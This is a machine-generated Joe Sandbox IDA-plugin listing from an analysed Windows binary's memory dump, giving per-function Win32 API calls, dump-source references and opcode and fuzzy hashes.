                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                      • String ID: X
                                                                                      • API String ID: 83654149-3081909835
                                                                                      • Opcode ID: 9f25ccc0b2646cc40a5a802d2febb649e4807fbf76c1fb78e63ebedcb62c110a
                                                                                      • Instruction ID: 5932d36935d422364efdd8f72eb566603453afed043c3fa6b7ad214a4132ffe8
                                                                                      • Opcode Fuzzy Hash: 9f25ccc0b2646cc40a5a802d2febb649e4807fbf76c1fb78e63ebedcb62c110a
                                                                                      • Instruction Fuzzy Hash: CCE1B3315043009FD714EF24C881AAEB7E4FF85318F08896DF8999B2A2DB30ED45DB96
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • BeginPaint.USER32(?,?,?), ref: 00C29241
                                                                                      • GetWindowRect.USER32(?,?), ref: 00C292A5
                                                                                      • ScreenToClient.USER32(?,?), ref: 00C292C2
                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C292D3
                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00C29321
                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C671EA
                                                                                        • Part of subcall function 00C29339: BeginPath.GDI32(00000000), ref: 00C29357
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                      • String ID:
                                                                                      • API String ID: 3050599898-0
                                                                                      • Opcode ID: 0d8f3ed64c7c804688e62e1ecfb4ac45deff12f4ef654225506753400823a1a9
                                                                                      • Instruction ID: 01c2724ca7703e05504bcc9e97a97e5b9f90bbdb30ed0202793cc30a4a9f332a
                                                                                      • Opcode Fuzzy Hash: 0d8f3ed64c7c804688e62e1ecfb4ac45deff12f4ef654225506753400823a1a9
                                                                                      • Instruction Fuzzy Hash: 1341AB71104310AFD720DF25ECC4FBE7BB8EB46724F040629F9A48B2A2C7309945DB61
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C8080C
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C80847
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00C80863
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00C808DC
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C808F3
                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C80921
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3368777196-0
                                                                                      • Opcode ID: 4532a4b7d122e6130125e6681f84ff413ddaeab85f6e66a8755bc1e1b73d9967
                                                                                      • Instruction ID: 1419f58d7f9f3679ca31c99abf1284717b00d98ebdf3b89827a088d10fb2c6e0
                                                                                      • Opcode Fuzzy Hash: 4532a4b7d122e6130125e6681f84ff413ddaeab85f6e66a8755bc1e1b73d9967
                                                                                      • Instruction Fuzzy Hash: 5E414971A00205EBDF15AF54DC85BAA77B8FF05314F1440A9ED00AA297DB30DE65DBA4
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C6F3AB,00000000,?,?,00000000,?,00C6682C,00000004,00000000,00000000), ref: 00CA824C
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00CA8272
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CA82D1
                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00CA82E5
                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00CA830B
                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CA832F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 642888154-0
                                                                                      • Opcode ID: 7b252f1eeb07d65b67bec318d550a688ff15b4a398115e517b86dbdeb110d888
                                                                                      • Instruction ID: 52c879f6b0fd249c131c663b3bcf52fc590871c7d5ab008eb7f8b04e863e9b0e
                                                                                      • Opcode Fuzzy Hash: 7b252f1eeb07d65b67bec318d550a688ff15b4a398115e517b86dbdeb110d888
                                                                                      • Instruction Fuzzy Hash: F141B430601645EFDF15CF14D8D9BE87BE0BB0B718F184269EA584F272CB31A959CB50
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00C74C95
                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C74CB2
                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C74CEA
                                                                                      • _wcslen.LIBCMT ref: 00C74D08
                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C74D10
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C74D1A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                       • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                      • String ID:
                                                                                      • API String ID: 72514467-0
                                                                                      • Opcode ID: 77350b46c92aa043222f993083f89480aa5e9c1cacd3205bf116d5f381988db6
                                                                                      • Instruction ID: 22404f61c250ac3c2063e47f742473ae5b922a5d56b8bb9b0b30f27d4f3deb1c
                                                                                      • Opcode Fuzzy Hash: 77350b46c92aa043222f993083f89480aa5e9c1cacd3205bf116d5f381988db6
                                                                                      • Instruction Fuzzy Hash: FB21C531204214BBEB2A9B69EC49B7F7BACDF56750F108079F809CA191EB61DD0196A0
                                                                                      APIs
                                                                                        • Part of subcall function 00C13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C13A97,?,?,00C12E7F,?,?,?,00000000), ref: 00C13AC2
                                                                                      • _wcslen.LIBCMT ref: 00C8587B
                                                                                      • CoInitialize.OLE32(00000000), ref: 00C85995
                                                                                      • CoCreateInstance.OLE32(00CAFCF8,00000000,00000001,00CAFB68,?), ref: 00C859AE
                                                                                      • CoUninitialize.OLE32 ref: 00C859CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 3172280962-24824748
                                                                                      APIs
                                                                                        • Part of subcall function 00C70FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C70FCA
                                                                                        • Part of subcall function 00C70FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C70FD6
                                                                                        • Part of subcall function 00C70FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C70FE5
                                                                                        • Part of subcall function 00C70FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C70FEC
                                                                                        • Part of subcall function 00C70FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C71002
                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00C71335), ref: 00C717AE
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C717BA
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C717C1
                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C717DA
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00C71335), ref: 00C717EE
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C717F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                      • String ID:
                                                                                      • API String ID: 3008561057-0
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C714FF
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00C71506
                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C71515
                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00C71520
                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7154F
                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C71563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                      • String ID:
                                                                                      • API String ID: 1413079979-0
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00C33379,00C32FE5), ref: 00C33390
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C3339E
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C333B7
                                                                                      • SetLastError.KERNEL32(00000000,?,00C33379,00C32FE5), ref: 00C33409
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00C45686,00C53CD6,?,00000000,?,00C45B6A,?,?,?,?,?,00C3E6D1,?,00CD8A48), ref: 00C42D78
                                                                                      • _free.LIBCMT ref: 00C42DAB
                                                                                      • _free.LIBCMT ref: 00C42DD3
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00C3E6D1,?,00CD8A48,00000010,00C14F4A,?,?,00000000,00C53CD6), ref: 00C42DE0
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00C3E6D1,?,00CD8A48,00000010,00C14F4A,?,?,00000000,00C53CD6), ref: 00C42DEC
                                                                                      • _abort.LIBCMT ref: 00C42DF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      APIs
                                                                                        • Part of subcall function 00C29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C29693
                                                                                        • Part of subcall function 00C29639: SelectObject.GDI32(?,00000000), ref: 00C296A2
                                                                                        • Part of subcall function 00C29639: BeginPath.GDI32(?), ref: 00C296B9
                                                                                        • Part of subcall function 00C29639: SelectObject.GDI32(?,00000000), ref: 00C296E2
                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00CA8A4E
                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00CA8A62
                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00CA8A70
                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00CA8A80
                                                                                      • EndPath.GDI32(?), ref: 00CA8A90
                                                                                      • StrokePath.GDI32(?), ref: 00CA8AA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                      • String ID:
                                                                                      • API String ID: 43455801-0
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00C75218
                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C75229
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C75230
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00C75238
                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C7524F
                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00C75261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDevice$Release
                                                                                      • String ID:
                                                                                      • API String ID: 1035833867-0
                                                                                      APIs
                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C11BF4
                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C11BFC
                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C11C07
                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C11C12
                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C11C1A
                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C11C22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual
                                                                                      • String ID:
                                                                                      • API String ID: 4278518827-0
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C7EB30
                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C7EB46
                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00C7EB55
                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7EB64
                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7EB6E
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C7EB75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                      • String ID:
                                                                                      • API String ID: 839392675-0
                                                                                      • Opcode ID: 6d69720ed31fa258d2ac85c50687409cf44d8b2f450bd7b3a3fecd70b3d7a905
                                                                                      • Instruction ID: 718fa6ef987be03163bcba1bf5523845c0ee8e921c6a998176010cffea87ad1c
                                                                                      • Opcode Fuzzy Hash: 6d69720ed31fa258d2ac85c50687409cf44d8b2f450bd7b3a3fecd70b3d7a905
                                                                                      • Instruction Fuzzy Hash: E0F05472241158BBE7215B629C4DFEF3E7CEFCBB15F004159F611D2091DBA05A01C6B5
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?), ref: 00C67452
                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C67469
                                                                                      • GetWindowDC.USER32(?), ref: 00C67475
                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00C67484
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00C67496
                                                                                      • GetSysColor.USER32(00000005), ref: 00C674B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                      • String ID:
                                                                                      • API String ID: 272304278-0
                                                                                      • Opcode ID: eafee67606e2c2619e46f29636934ebbe62e6cf44b356fda308da569ef87e539
                                                                                      • Instruction ID: c19e8b44d815096e33fba5e8ce59a9d3c11b92a4f5f9d0ac0619a008162c6d64
                                                                                      • Opcode Fuzzy Hash: eafee67606e2c2619e46f29636934ebbe62e6cf44b356fda308da569ef87e539
                                                                                      • Instruction Fuzzy Hash: 9E018B31400215EFDB209FA4DD88BAE7BB5FB05319F140560F926A31A0CF311E51EF50
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C7187F
                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 00C7188B
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C71894
                                                                                      • CloseHandle.KERNEL32(?), ref: 00C7189C
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C718A5
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C718AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                      • String ID:
                                                                                      • API String ID: 146765662-0
                                                                                      • Opcode ID: adf68bbd5a7d9e55fdf4a205740ca9824df66b3c664218c7c2b0bd85868cc687
                                                                                      • Instruction ID: 62bde819576f4fee5bef881085fd59299cc01cbe0ab32f26c32817fd50090999
                                                                                      • Opcode Fuzzy Hash: adf68bbd5a7d9e55fdf4a205740ca9824df66b3c664218c7c2b0bd85868cc687
                                                                                      • Instruction Fuzzy Hash: 85E0C236204101BBDA015BA1ED4CB8EBB69FB4AB26B108220F22582070CB329421DF50
                                                                                      APIs
                                                                                        • Part of subcall function 00C17620: _wcslen.LIBCMT ref: 00C17625
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C7C6EE
                                                                                      • _wcslen.LIBCMT ref: 00C7C735
                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C7C79C
                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C7C7CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
